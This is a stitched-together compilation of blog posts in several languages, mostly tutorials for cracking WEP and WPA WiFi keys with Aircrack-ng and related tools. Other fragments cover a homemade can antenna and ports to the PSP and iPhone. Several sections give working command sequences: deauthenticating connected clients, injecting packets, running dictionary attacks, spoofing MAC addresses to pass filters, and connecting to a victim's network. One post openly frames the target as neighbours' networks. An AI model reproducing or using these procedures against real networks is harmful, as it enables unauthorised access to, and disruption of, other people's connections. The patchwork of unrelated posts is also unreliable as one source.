One of my friends complained to me the other day that Aircrack needs a GUI, “man, it’d be less complicated, right”. Er, wrong. It’s so incredibly simple I honestly think a GUI is completely unnecessary. As ever the terminal is your best friend. I guess that’s a Windows mentality, folk aren’t used to doing things the easy way. Though, I admit that some tutorials (especially in the Linux world) do go on a bit and could probably be simplified. So, for my friend and others like him, here’s how to use Aircrack without the rambling.

Open up a terminal and su to root.

Turn off your wireless card.
#ifconfig wlan0 down

Enable monitoring.
#airmon-ng start wlan0

Do some monitoring… Make a note of the info on whichever network you fancy… In particular, the BSSID (e.g. 00:11:22:33:44:55), CHANNEL and whether it’s WEP or WPA.
#airodump-ng mon0

WEP

Monitor the chosen network and capture y’self some packets. This can take a while. Anywhere between 5,000 and 80,000 packets are usually needed.
#airodump-ng -c CHANNEL --bssid BSSID -w dump wlan0

Crack that sucker. Easy, no.
#aircrack-ng -b dump*.cap

WPA

WPA is slightly different but just as easy. Monitor the chosen network.
# airodump-ng -c CHANNEL --bssid BSSID -w handshake mon0

See the MAC (another 12 digit number) of the fella connected to it? Good, jot it down. Open up another terminal and force him to reconnect (as root, obviously).
#aireplay-ng -0 5 -a -c MAC mon0

Once you’ve captured a handshake you can crack it. Of course, you’ll need a decent dictionary file (they ain’t so hard to find), and it can take some time depending on the size of your dictionary/complexity of password. Luckily, you can do it offline once you’ve captured a handshake.
#aircrack-ng -a 2 -w /PATH/TO/DICT handshake*.cap

So who needs a GUI?

¨NOTA: LA INFORMACIÓN AQUÍ COLOCADA ES CON FINES DE CONOCIMIENTO GENERAL Y DE LIBRE TRANSMISIÓN DE LA INFORMACIÓN PUBLICA, EL USO DADO A ESTOS DATOS NO ES DE RESPONSABILIDAD DEL AUTOR¨

Voy a explicar los dos métodos q considero mas eficientes y rápidos:

• Metodo 1 AiroScript en Ubuntu

Primero para poder entrar a una red protegida con clave debemos instalar algunos paquetes, estos se pueden instalar desde consola con el comando (sin las comillas ¨¨):

¨sudo apt-get install aircrack-ng konsole dhcpcd xterm kommander macchanger wireless-tools¨

Terminado esto hará falta descargar a nuestra pc el Script AiroSript, pueden hacerlo desde

- la versión en Ingles

http://daouid.googlepages.com/airoscript1-7RC2.sh

- la versión en español(recomendado) gracias a seguridadwireless.net

http://hwagm.elhacker.net/descargas/linux4/airoscript-sp.sh

listo esto, hay un par de errores en el Script que debemos corregir para que todo funcione correctamente:

Abrimos el archivo con permisos ROOT usando los comandos

¨$ cd /DIRECTORIO DE LA DESCARGA/¨

¨$ sudo gedit airoscript-sp.sh ¨

(recuerden no poner ¨¨ ni $ de lo contrario no funcionara)

- En la linea 1

Tenemos: #! /bin/sh

Remplazar por #! /bin/bash

- En la linea 331

Tenemos: function de_auth_fake {ct

Remplazar por: function de_auth_fake {

Listo! guardar y cerrar, ahora necesitamos darle permisos de ejecucion, para esto, clic derecho sobre el archivo propiedades>permisos y marcamos la opcion ¨permitir al archivo ejecutar como un programa¨ aceptar y cerrar…

De vuelta a la consola, nuevamente usamos:

¨$ cd /LUGAR_DONDE_ESTA_EL_ARCHIVO/¨

¨$ sudo ./airoscript-sp.sh ¨

–>Con eso se ejecutara el programa

Deberían tener una pantalla similar a:

1) Seleccionen la tarjeta de red que quieren usar para el ataque normalmente es la ath0, seleccionen y enter

2)Ahora en el menú principal del Script seleccionamos la opcion 1. Scan de esta forma escaneara las redes en busca de víctimas, nos dara a eleguir si escanear todos los canales (recomendado) o un canal especifico, selecciona y enter

3) Ahora volvemos al menú, y usamos la opción 2.Select para eleguir la victima

4) A continuación usamos la opción 3. Atack, esto tomara tiempo (varias horas) dependiendo de la tarjeta wifi q tenga tu equipo debido a que debe leer 200.000 y 1.000.000 de paquetes.

5) Terminado el paso anterior volvemos a la ventana principal y seleccionamos Crack, el programa usara los paquetes recopilados para descifrar la clave basándose en diccionario o en código aleatorio,

Si todo salio bien, tenemos la clave del router que atacamos, les recomiendo anotarla en alguna hoja de papel o en algun archivo para no tener q repetir todo el proceso una vez mas, con esa clave pueden entrar desde cualquier otra computadora.

• Metodo 2 Aircrack

   

   

1º) Instalación

- Si usas Ubuntu Linux no hace falta que hagas todo esto, simplemente ve a “Sistema > Administración > Synaptic” e instala el paquete “aircrack-ng”.

- También puedes saltarte el paso de la instalación si usas BackTrack Linux, pues trae todo ya instalado. (Más abajo hablamos de él).

Empezamos: Antes de nada tenemos que asegurarnos de que nuestro nucleo tiene compatibilidad con nuestro dispositivo wifi, para saber que nucleo tenemos abrimos un terminal y ejecutamos

$ uname -a

Esto nos dara la info de nuestro equipo. En el caso de que no funcione nuestra tarjeta wifi tendremos que mirar por internet a ver qué chip tiene e instalar el driver adecuado.

Una vez vemos que nuestro equipo es capaz de conectar a una red wifi conocida continuaremos. Tras haber configurado la red wifi debemos saber qué interface tiene:

$ iwconfig

De la lista que sale buscamos la interfaz que corresponda al wifi. (puedes usar también el comando ifconfig -a) A partir de aqui supongo que se llama “eth1″.

Ahora bajarmos Aircrack y lo compilamos. Antes de descargarlo hay que instalar sus dependencias:

# apt-get install build-essential

despues a compilar:

$ wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz

$ tar -zxvf aircrack-ng-1.0-rc1.tar.gz

$ cd aircrack-ng-1.0-rc1

$ make

$ sudo make install

2º) Cómo usar Aircrack

Una vez tenemos en nuestras manos este programita ya podemos empezar…

Abrimos un terminal de comandos, lo recomendable es operar en él como root para que no tengamos que ir poniendo “sudo” antes de cada cada orden, esto se hace con el comando:

$ sudo su

Lo primero es ver las redes wifi a las que tenemos acceso:

# airodump-ng eth1

Consejos:

- Sustituye “eth1″ por la interface de tu tarjeta wireless tambien puede presentarse como ¨wlan0¨(mira cuál es con el comando iwconfig).

- Si te da un error del tipo “resource busy” significa que estás conectado a otra red wifi. Para que funcione simplemente desconectate de la red.

Una vez hecho esto nos sacara algo asi:

CH 14 ][ Elapsed: 1 min ][ 2008-11-26 19:28

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:00:00:00:00:00 4 43 0 0 11 54. WEP WEP josewifi

11:11:11:11:11:11 64 8 0 14 54. WEP WEP juan

BSSID STATION PWR Rate Lost Packets Probes a

En este caso tenemos 2 redes a elegir, nos fijamos en la red ‘josewifi’ con una MAC de 00:00:00:00:00:00 en el canal CH 11. Suponiendo que este es nuestro objetivo nos fijamos en que tenga modo de encriptacion WEP.

Consejos:

- Para que airodump deje de actualizar los datos pulsa “Cntrol+C”.

- Puedes hacer búsquedas más detalladas usando las opciones que aparecen al ejecutar “airodump –help”

Ahora que ya tenemos fijado un objetivo lo que vamos a hacer es capturar Data y Beacons para luego lanzar aircrack-ng y descifrar su clave WEP.

1- Lanzamos airodump-ng para que capture paquetes:

$ airodump-ng –channel 11 –bssid 00:00:00:00:00:00 -w captura eth1

Ahora lo dejamos corriendo durante todo el rato para que vaya capturando en el archivo “captura-01.cap”, que guardará en la carpeta en la que estés trabajando (generalmente en tu carpeta de usuario).

2- (los pasos 2, 3 y 4 son opcionales) Nos vamos a identificar con la estacion para que nos permita inyectar trafico y asi tener más datos para sacar la contraseña antes.

# aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e josewifi eth1

en la opción -h ocultamos nuestra MAC con una introducida (inventada) por nosotros

Nos deberia decir: Association successful

3- ARP-request replay. Abrimos otra consola y

# aireplay-ng -3 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e josewifi eth1

este también lo dejamos correr mientras que trabajamos.

4- Inyectar trafico. Este paso no funciona bien en todos los dispositivos wifi, dependiendo de los drivers y nucleo de nuestro equipo. Esto nos permitira acelerar notablemente el proceso de captura de paquetes.

# aireplay-ng -2 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -r captura-01.cap eth1

5- Lanzar aircrack-ng para descifrar la contraseña:

# aircrack-ng -a 1 -e josewifi -b 00:00:00:00:00:00 captura-01.cap

El argumento “-a 1″ indica que estamos descifrando una contraseña WEP, para descifrar una WAP deberíamos poner “-a 2″.

Aircrack-ng también se debe dejar correr de fondo mientras se capturan paquetes porque ira intentando descifrar la clave segun vaya consiguiendo nuevos paquetes.

¡Y ya está! Una vez tengamos practica podremos crackear una contraseña WEP en unos 15 minutos.

Berikut adalah tutorial penginstalan Aircrack-ng dan Aircrack-ptw di Ubuntu 9.04. Mengenai apa itu Aircrack-ng dan Aircrack-ptw, dan bagaimana menggunakannya, sedang dalam tahap pembuatan.

Instalasi Aircrack-ng

• Sebaiknya jangan menggunakan installer dari www.aircrack-ng.org, tetapi gunakan paket dari repository
• instal dari synaptic (mark >> apply) atau ketikkan di terminal [sudo apt-get install aircrack-ng]

Instalasi Aircrack-ptw

• Download paket dari sini
• ketikkan di terminal [tar -zxvf <nama-file>]
• download paket pendukung [sudo apt-get install libpcap0.8-dev]
• masuk ke dalam folder aircrack-ptw [cd <nama-file>]
• kompilasi file ‘makefile’ [make]

Gadījās tā, ka vecā antena saplīsa, un izdomāju to uztaisīt pats.

Skaidrs, ka gatavot wireless antenu pašam ir krietni interesantāk, garšīgāk un lētāk, kā nopirkt jau gatavu, turklāt tas nav sarežģīti.

Zināju, ka daudzi veido antenas no bundžām (šādas antenas sauc par cantenna (can (no angļu val. bundža) + antenna ), metāla plāksnēm un stieplēm, bet lai noskaidrotu, kuras strādā labāk un kā tās labāk veidot, pameklēju internetā. Atradu šādu lapu: Wlan Antenna.

Secināju, ka visvieglāk antenu izveidot no bundžas. Nopirku ekranētu koksiālo kabeli, konektorus, sagrieztus ananāsus bundžā un no drauga dabūju resnu vara stiepli.

Plauktā atradu sen nelietoto lodāmuru, alvu un vēl šādus tādus instrumentus, ar kuru palīdzību uztaisīju  zemāk aplūkojamajos attēlos redzamo antenu.

(Bundžas apakšā uztaisīts caurums, kurā ieskrūvē un pielodē konektoru.)

(Bevzadu interneta adapterim standartā ir cita izmēra kontakts, tapēc to nolodēju nost un uztaisīju pa savam.)

(Ja nepietiek ar īso vadu, var pievienot klāt garāku.)

(Broadcom – laptopa iebūvētā tīkla karte; Realtek – ārējā tīkla karte ar bunžu antenas vietā.)

(Adapteris pieslēgts pie mana PC. Terminālī airodump-ng.)

Pat neskatoties uz to, ka bundža nav ar pilnīgi taisnām malām un dibenu, tā uztver lieliski.

Papildināts: Nedaudz pakustinot antenu uz visām pusēm, atradās tik daudz wireless tīkli, ka man vairs negāja iekšā airodump-ng ekrānā.

P.S. Šobrīd ēdu pāri palikušos ananāsu gabalus. 

Desde el último post ha pasado un año, durante el cual he tenido el blog abandonado. Podría poner alguna excusa, como que me estaba esperando a que funcionara el LHC, o cualquier otra chorrada, pero simplemente no había ganas y punto

Pero ahora que vuelvo a ello quiero compartir con muchos de vosotros, maqueros que me leeis, la forma más efectiva de comprobar que vuestros vecinos utilizan un sistema de cifrado lo suficiente seguro para su conexión WiFi. Obviamente, la finalidad de este post es meramente educativa, para que el lector sea consciente de la fortaleza de un sistema WiFi, ya sea WEP o WPA.

Para empezar necesitamos capturar paquetes de las redes existententes. KisMAC es la herramienta perfecta para ello, ya que captura paquetes de todo tipo de redes, incluso las ocultas. La primera vez que abrimos el programa deberemos configurar el driver para la tarjeta de red, que en todos los portátiles actuales de Apple es una Airport Extreme, y elegimos el driver para el modo pasivo (promiscuo). Una vez añadido, lo seleccionamos y en el apartado Dump filter seleccionamos Keep everything, eligiendo el destino donde queremos que se guarde el log.

KisMAC permite hacer inyección de paquetes para descifrar la contraseña con otros drivers, pero no con Airport Extreme. Así que utilizaremos el programa descifrador por excelencia, la suite Aircrack, que ya se puede compilar en MacOS. La forma más cómoda es tener el gcc y el Subversion instalado (el gcc instalando las XCode Tools y el Subversion vía web), e instalar y compilar desde Terminal:

$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ cd aircrack-ng
$ make
$ sudo make install

Después de reiniciar la Terminal ya tendremos los comandos de Aircrack en el path (y si no pues se añade /usr/local/bin/), así que sólo tendréis que pasarle el log creado por KisMAC como primer parámetro $ aircrack-ng Log. ya sabéis, a más paquetes capturados más fácil sacar la contraseña. También es recomendable echarle un ojo al manual de aircrack y las diferentes opciones que ofrece.

Por cierto, no me he enrollado mucho en la parte técnica para que no quedara muy largo, pero cualquier duda es bienvenida

Another method to gain Wifi keys, credit to hm2075

Working environment?
My working environment is under VMware between BT4-Beta and WindowsXP SP3.

Where can I get the video?
Its HERE

**Update** (Aug 2009)
Automated Non-Transparent Fake AP can be found HERE. (Register to forum to view content)

Abro dos apartados nuevos en mi blog.

El primero es de Scripts, que ahora mismo esta vacio pero espero propuestas para ir publicando.

Y el segundo apartado es el de tutoriales, donde podemos ver pequeños manuales de Linux para poder hacer ciertas cosas interesantes, el primer post es el de Desencriptar Claves WEP, lo podeis ver aqui.

Gaby_64 actualiza este port del AirCrack,  programa que en un futuro pretende que podamamos descifrar la contraseña de nuestro router wifi usando la PSP.
Cambios:

/ -Corregidos muchos errores.
/ -Nuevas opciones añadidas, sobre los AP’s por (SSID/SECURITY/SIG).
/ -Añadido escaneo de contraseñas WPA 1 y 2 (quizá haya no funcione bien).
/ – Añadido soporte de WEP de 104 bit.
/ -Corregidos los problemillas relacionados con la GUI.
/ -Añadido el desplazamiento de la GUI.
/ -El desplazador tiene un tope de 256 líneas.
/ -Corregidos los temas del interruptor wlan.
/ -Corregidos temas de configuracion.
/ -Nuevo sistema de archivos cap (ahora se puedes incluir un archivo.inf con tu archivo cap).
/ -Crackeador de WPA-PSK 1 y 2 (arreglado con un bit mas rápido, gracias a Jake y Brandon’s por su ayuda)
/ -Mejoras en el crackador:
-WPA-PSK 1 & 2 mejora de la velocidad de doble uso (sobre los 3.74 p/s)
-WPA-PSK 1 & 2 añadido archivo crackeador hash (frapido pero requiere dict2hash para cada ssid)
-WPA-PSK 1 & 2 archivo generador hash (dict2hash) (eliminado multi-threading por conflictos IO)
/ -More improvements have been done to the wpa cracker (New sha1 implementation)(now 9.44 p/s(without ME))
/ -Usando el ME obtienes un poco mas de velocidad (9.74 p/s)
/ -Añadido AP logging al scanner (ahora puedes salvar un new AP al scan.log)
/ -Añadido un sonido de deteccion de un AP (es el clasico beep del infrarojos, tambien puedes ponerle un propio de 2,5seg)
/ -Añadida nueva configuración, Activa AP detection beep para (NO SECURITY/WEP/WPA-PSK(TKIP)/WPA-PSK(AES)/ALL/NONE)
/ -Añadido bloqueo del power para evitar que apagues la psp por error durante el analisis.

Planeado en un futuro:

-Deteccion y selector de Ap.
-Captura de paquetes
-Dupeador de paquetes (crea un archivo .cap)
-Crackeador de WEP
-Crackeador de WPA
-Mas Herramientas de Cracking para WEP y WPA
-Alguna GUI mas maja
-Función Guardar (Guardar la información con la clave del AP)

Descargatelo de aqui

Recuerda que esta versión como he puesto mas arriba aun no es capaz de crackear WEP ni WPA.

airtouchAircrack è un programma di cracking per reti 802.11 WEP e WPA-PSK che è in grado di ricavare le chiavi di accesso una volta che la giusta quantità di dati necessari viene stata catturata.
La suite è disponibile per sistemi Linux, Windows ed esite anche un porting per iPhone chiamato TouchAir. Per installare la nota suite anche su iPhone occorre seguire questi piccoli passi:

* Scarichiamo TouchAir e scompattiamo l’archivio.
* Colleghiamo l’iPhone al computer e accediamo tramite ssh. (Possiamo usare anche iPhone Tunnel Suite che ci permette di accedere in ssh senza usare necessariamente la connessione wifi)
* Spostiamo la cartella aircrack all’interno della cartella var presente sull’iphone e assicuriamoci che abbia i permessi 777.

Per fare partire Aircrack apriamo il terminale Term-vt100, presente nella categoria System di Cydia, e eseguiamo il seguente comando:
/var/aircrack/aircrack-ng -a 1 /var/aircrack/touch.ivs

Ecco un link alla documentazione ufficiale di aircrack per imparare ad usare correttamente il software.

Ecco infine un video che dimostra il suo funzionamento:

Oggi voglio proporti un articolo che sono sicuro sarà di tuo gradimento…

Se hai seguito il mio Blog intuirai sicuramente di cosa parlo… sto parlando dei metodi per decriptare le chiavi delle reti wi-fi.

Continua sul Nuovo Blog

Le nostre reti wireless sono poco sicure, basta poco per potersi collegare a internet con l’access point di un altro…
Proviamo ad utilizzare Aircrack, uno dei migliori tools per il wireless craking ed il wardriving, supportato da diversi sistemi operativi, tra cui Windows.

Cosa vi serve:

- Scaricate ed installate Aircrack

- Se utilizzate “Winaircrack” (Aircrack con interfaccia grafica) copiate i files peek.dll e peek5.sys all’interno della cartella di Aircrack.

- Eseguiremo l’applicazione dal prompt di DOS: per poter eseguire il programma anche se non siamo nella directory che lo contiene, cliccate col tasto destro del mouse su “Risorse del computer, Proprietà, Avanzate, Variabili d’ambiente, Modifica” portatevi alla fine della linea su cui sono già scritte altre variabili d’ambiente, inserite un punto e virgola (“;”) e scrivete il percorso in cui si trova il programma Aircrack (es. C:\Documents and Settings\2BFree\Desktop\aircrack-ng-0.3-win\aircrack-ng-0.3-win\bin).

- Avrete anche bisogno di installare dei nuovi driver per il vostro adattatore di rete: i driver originali non sono stati pensati per fare cose simili (per trovare dei driver che possano fare al caso vostro visitate il sito WildPacket)

- Per installare i nuovi driver aprite “clic destro su Risorse del Computer, Proprietà, Gestione Periferiche, clic destro sul vostro adattatore di rete, Proprietà, Driver, Aggiorna Driver, Installa da un elenco o percorso specifico” scegliete il percorso in cui avete scaricato i driver. Assicuratevi infine che il vostro adattatore di rete sia ora compatibile col tutto

Per facilitarvi la comprensione, durante i vari passi di questo tutorial fate riferimento al diagramma di flusso presente sul sito Wireless Defence. Se non avete confidenza con i “MAC Address” allora, prima di proseguire, leggetevi anche il relativo articolo su Wikipedia.

Il primo passo è ovviamente quello di trovare una rete wireless . Potete andarvene in giro col vostro computer portatile a fare del wardriving oppure potete utilizzare una apposita chiavetta “Wi-fi Finder”.

Digitate “Airodump” nel prompt di DOS (Start, esegui, cmd). Vi comparirà una finestra contenete le schede di rete trovate sulla vostra macchina. Notate che accanto al nome delle schede di rete è presente un numero identificativo. Ad esempio:

14 NETGEAR WG511T 54 Mbps Wireless PC Card
22 NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card

In questo caso digitate 22, il numero identificativo della scheda che ci interessa utilizzare (in genere è quella che riporta una qualche identificazione del tipo “802.11x”).

Ora vi viene chiesto di indicare il chipset utilizzato dal vostro adattatore di rete. Ad esempio:

Interface types: ‘o’ = HermesI/Realtek

‘a’ = Aironet/Atheros

Selezionate il vostro, in questo caso scegliendo “o” oppure “a”. Per sapere quale chipset è montato sulla vostra scheda di rete potete dare uno sguardo al sito: http://www.linux-wlan.org/docs/wlan_adapters.html.gz

Ora vi sarà richiesto di inserire il numero del canale da controllare (sniffing). In genere per gli USA e l’UK utilizzate l’11, per l’Europa il 14. Se volete fare una scansione di tutti i canali utilizzate lo zero.

Ora vi sarà richiesto di inserire il numero del canale da controllare (sniffing). In genere per gli USA e l’UK utilizzate l’11, per l’Europa il 14. Se volete fare una scansione di tutti i canali utilizzate lo zero.

In seguito il programma chiederà di digitare il nome da dare al file che verrà creato a partire dalla scansione del canale. Digitate il nome che vi pare, ad esempio “WEP1”.

Ora Aircrack vi chiederà se salvare gli interi pacchetti catturati o soltanto gli IV. Per craccare una chiave WEP vi basta salvare semplicemente gli IV (il che vi farà risparmiare diverso spazio sull’hard disk, quindi digitate “y”).

Adesso vedrete una schermata simile:

BSSID = l’indirizzo MAC dell’Access Point

PWR = indica la forza del segnale che si sta ricevendo

BEACONS = sono pacchetti “in chiaro” che l’Access Point trasmette sostanzialmente per dire “sono un access point, collegati a me”

DATA = è quello che ci interessa: sono gli IV che Aircrack utilizzerà per trovare
la password WEP

ENC = il tipo di incapsulamento: WEP, WPA, OPEN…

ESSID = Il nome della rete Wireless. L’SSID è una sorta di identificativo della rete. Se ad esempio l’Access Point ha come SSID il nome “pippo” allora le schede wireless che ci si vogliono connettere devono impostare a loro volta come SSID “pippo”.

Nella seconda parte dell’immagine sopra vediamo i vari client che stanno “dialogando” con l’Access Point”, più esattamente vediamo i vari indirizzi MAC dei client. Quest’informazione può risultare utile in seguito quindi annotatevi gli indirizzi MAC. Questo perché in un Access Point è possibile impostare un filtro di indirizzi MAC: in questo modo soltanto le schede di rete che hanno un indirizzo MAC riportato nel filtro potranno collegarsi. Ciò significa che anche se possediamo la chiave WEP non possiamo accedere all’Access Point a meno che l’indirizzo MAC del nostro adattatore di rete non sia stato impostato nel filtro dell’Access Point. Ad ogni modo un caso simile sarà trattato dopo, per il momento non preoccupiamocene.

Aicrack continuerà a collezionare IV finché non lo fermate. Più IV scaricate e più probabilità avete di decifrare la chiave. Non c’è un riferimento esatto del tipo “lunghezza chiave = tot numero di IV da scaricare”. In linea generale prendete per buono che per trovare una chiave WEP da 40 bit potete scaricare dai 250.000 ai 400.000 IV: Aircrack dovrebbe trovare la chiave in pochi secondi. Ad ogni modo vi conviene cominciare con pochi IV infatti, se questi non bastano ad Aircrack per trovare
la chiave WEP, non dovrete ricominciare tutto da zero: basterà che quando vi verrà chiesto il nome che volete dare al file inseriate lo stesso nome che avevate già utilizzato in precedenza (in tal modo il file non verrà sovrascritto ma verrà invece “continuato”, cioè incrementato). Per una chiave da 104 bit collezionate circa 2.000.000 di IV: a volte ne bastano molti meno (anche se il programma impiegherà più tempo per trovare la chiave), altre volte purtroppo dovrete scaricarne di più…

Quando sarete soddisfatti del numero di IV collezionati premete “CTRL + C” per fermare il programma.

Scrivendo “Aircrack-ng” nel prompt vi verrà mostrata la lista dei parametri che è possibile utilizzare. Supponiamo di aver scaricato intorno ai 400.000 IV, in genere sufficienti per scovare una chiave WEP da 40 bit. Digitiamo allora il comando “aircrack-ng -n 64 WEP1.ivs”. Con il parametro “-n 64” diciamo al programma che la chiave ha una lunghezza massima di 64 bit e di non provare quindi oltre (anche perché, come già ricordato, non abbiamo ancora scaricato abbastanza IV per lunghezze di chiave maggiori). Il parametro “-f” che in questo esempio non abbiamo utilizzato serve per specificare l’intensità dell’attacco brute-force che di default è a livello 2: volendo potete specificare un livello maggiore, ad esempio 5.

Da notare anche l’estensione del file (WEP1.ivs): sarà *.ivs se avevate deciso di salvare soltanto gli IV, sarà *.cap se avevate deciso di salvare gli interi pacchetti catturati.

Se avrete fortuna il programma vi restituirà un messaggio di “KEY FOUND” seguito dal nome della chiave.

Ora che avete la chiave utilizzatela proprio come se doveste connettervi ad una vostra rete “domestica”. Se l’SSID dell’Access Point è abilitato seguite questa spiegazione; in caso contrario vi rimando all’ultimo paragrafo di questa guida.

Start, Connetti a, Connessioni di rete senza fili, Visualizza reti senza fili disponibili. Se l’SSID è abilitato (è visibile), questo vi appare nella finestra delle connessioni disponibili (e in genere potete anche vedere se utilizza il WPA o meno come sistema di cifratura). Fate doppio clic sull’icona della connessione ed inserite la password che avete trovato in precedenza: è fatta. Se non riuscite a collegarvi la causa può essere:

1) L’access Point utilizza un filtro per indirizzi MAC

2) Siete troppo lontani dall’Access Point

3) La chiave che avete trovato è errata

1) L’AP utilizza un filtro per indirizzi MAC. In precedenza vi era stato detto di annotarvi gli indirizzi MAC che stavano dialogando con l’AP. Ora la cosa più semplice da fare è:
- Aspettare che uno degli indirizzi MAC annotati in precedenza si scolleghi
- Cambiare il nostro indirizzo MAC in modo da renderlo uguale a quello che si è appena scollegato (MAC Spoofing). Potete utilizzare il Software SMAC.

- Entrare nell’Access Point .

2) Siete troppo lontani dall’Access Point. Bisogno di spiegazioni??? Avvicinatevi…

3) La chiave che avete trovato è errata. O meglio… è possibile che sia corretta: assicuratevi di averla scritta in modo giusto. In particolar modo assicuratevi di non aver scritto eventuali zeri (“0”) come delle “O” in quanto non ci possono essere delle “O”!

Se l’SSID dell’Access Point è disabilitato nessun problema. Voi conoscete già qual è, vi è stato rivelato da Aircrack: vedi immagine sopra, ESSID. Quello che dovete fare è semplicemente inserire l’SSID trovato nelle impostazioni di connessione.
Start, Connetti a, Connessioni di rete senza fili, Visualizza reti senza fili disponibili, Modifica impostazioni avanzate, Reti senza fili, Aggiungi: scrivete l’SSID così come lo ha trovato Aircrack, l’autenticazione alla rete è normalmente APERTA > scegliere la cifratura WEP, togliere il segno di spunta dalla voce “la chiave sarà fornita automaticamente” ed inserire invece la chiave WEP che avete trovato grazie ad Aircrack (nota: inserite la chiave tutta di seguito, senza i due punti (“:”) di separazione).

Fonte BlogGiando

WPA crack

Questa guida spiega come catturare i pacchetti handshake wpa/wpa2 psk per potere attivare il bruteforce dictionary attack.

Saluti da drpepprONE

A tutt’oggi l’unico modo per poter recuperare una chiave wpa/wpa2 psk è usare un  bruteforce dictionay attack, ovvero un attacco di tipo dizionario che prova in modo sequenziale tutte le password presenti in un file dizionario.Nell’attesa che venga scoperta una possibile vulnerabilità del WPA/WPA2 psk, vediamo come procedere.

Attenzione!!! Questo metodo funziona solo con wpa/wpa psk ovvero con metodo di autenticazione  pre-shared keys. Se il metodo di autenticazione è diverso da PSK non sarà possibile utilizare tale procedura:

Attenzione affinchè  sia possibile catturare gli handshake è indispensabile e necessario che la nostra scheda wireless comunichi alla stessa velocità e nella stessa modalità del router access point.
Quindi per esempio se la nostra scheda è in  “B” mode e il router/AP è in  “G” mode, non sarà possibile catturare gli handshake.
Vale lo stesso per la velocità  ad esempio  11MB, 54MB, etc.
Per scoprire quale siano  la modalità e la velocità corrette si può provare a cambiarele finchè gli handshake non vengono catturarti.
Per verificare il rate usato dal router/Ap, avviamo kismet selezionamio il nostro router e nelle info verrà anche descritto il rate con cui esso comunica.
Per cambiare il rate useremo il seguente comando:

iwconfig ath0 rate [auto,11,54 etc]

Per cambiare il transmission mode eseguiremo il comando:

iwpriv ath0 mode 2 (dove il numero indica uno fra le seguenti modalità)

Mode 0 Automatic (a/b/g)
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g

New Update :

Se nonostante il rate di trasmeissione dalla nostra scheda di rete sia uguale a quello dell AP e non riceviamo l’handshake wpa, proviamo a settare il rate ad 1 M. In molti casi il rate ad 1 M risolve ogni problema.
[iwconfig ath0 rate 1M]

.::Prerequisiti:.

A]Un client connesso alla rete wpa/wpa2 psk(necessario per velocizzare il processo di creazione di pacchetti handshake)

B]Una scheda di rete con chipset compatibile con il packet injection in monitor mode

C]La distribuzione live BACKTRACK 2

D]I dati della rete wpa/wpa2 psk (il Mac Address del router/il Mac Address del client connesso, il canale wifi usato dal router per comunicare)

-.-.-.-.-.-Questa guida viene usata una scheda di rete wireless con chipset Atheros che usa i driver madwifi,  che utilizzano come nome virtuale del device athX-.-.-.-.-.-

1] Avviamo la nostra interfaccia wireless in monitor mode:

Verifichiamo prima con il comando iwconfig se esitono interfacce athX e in tal caso le eliminiamo:

airmon-ng stop ath0

Interface       Chipset         Driver

wifi0           Atheros        madwifi-ng
ath0           Atheros         madwifi-ng VAP (parent: wifi0) (VAP estroyed)

Lanciamo iwconfig per verificare che non ci siano più interfacce athX attive:

iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wifi0     no wireless extensions.If there are any remaining athX

Avviamo airmon-ng specificando  il canale su cui il router comunica:

airmon-ng start wifi0 9

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0           Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Per verificare che la nostra scheda sia effetivamente in monitor mode lanciamo il comando iwconfig e verifichiamo la voce “Mode”

iwconfig

lo        no wireless extensions.

wifi0     no wireless extensions.

eth0      no wireless extensions.

ath0      IEEE 802.11g  ESSID:”"  Nickname:”"
Mode:Monitor  Frequency:2.452 GHz  Access Point:00:0F:B5:88:AC:82
Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3
Retry:off   RTS thr:off   Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
Tx excessive retries:0  Invalid misc:0   Missed beacon:0

2]Avviamo airodump-ng per catturare gli  authentication handshake

airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w catturawpa ath0

Dove:

-c 9 è il canale su cui il router/access point comunica

- -bssid 00:14:6C:7E:40:80  Il  MAC address del router/access point.

-w catturawpa il nome del file in cui verrano salvati i dati.

Ecco come si presenta airodump-ng:

CH  9 ][ Elapsed: 4 s ][ 2007-11-22 16:58

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  drpepperONE

BSSID              STATION            PWR  Lost  Packets  Probes

00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116

Come vedete sopra è collegato un client.

3] Usare aireplay-ng per  deautenticare il client connesso

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Dove:

-0 è il  deauthentication mode
5  è il numero di  gruppi  di pacchetti  deauthentication da mandare
-a 00:14:6C:7E:40:80 è il  MAC address dell router/access point
-c 00:0F:B5:FD:FB:C2 è il  MAC address del  client da  deautenticare
ath0 il nome dell’interfaccia wireless

Questo è l’output del comando

“aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0”

12:55:56  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]
12:55:56  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]
12:55:57  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]
12:55:58  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]
12:55:58  Sending DeAuth to station   — STMAC: [00:0F:B5:FD:FB:C2]

Una volta deautenticato il client, esso riproverà a riconnettersi producendo cosi pacchetti handshake.

4] Avviare  aircrack-ng per recuperare la  pre-shared key
Per effettuare questo passo è necessario avere un file dizionario di pasword che contenga il più grosso numero possibili di password.

aircrack-ng -w dizionario -b 00:14:6C:7E:40:80 catturawpa*.cap

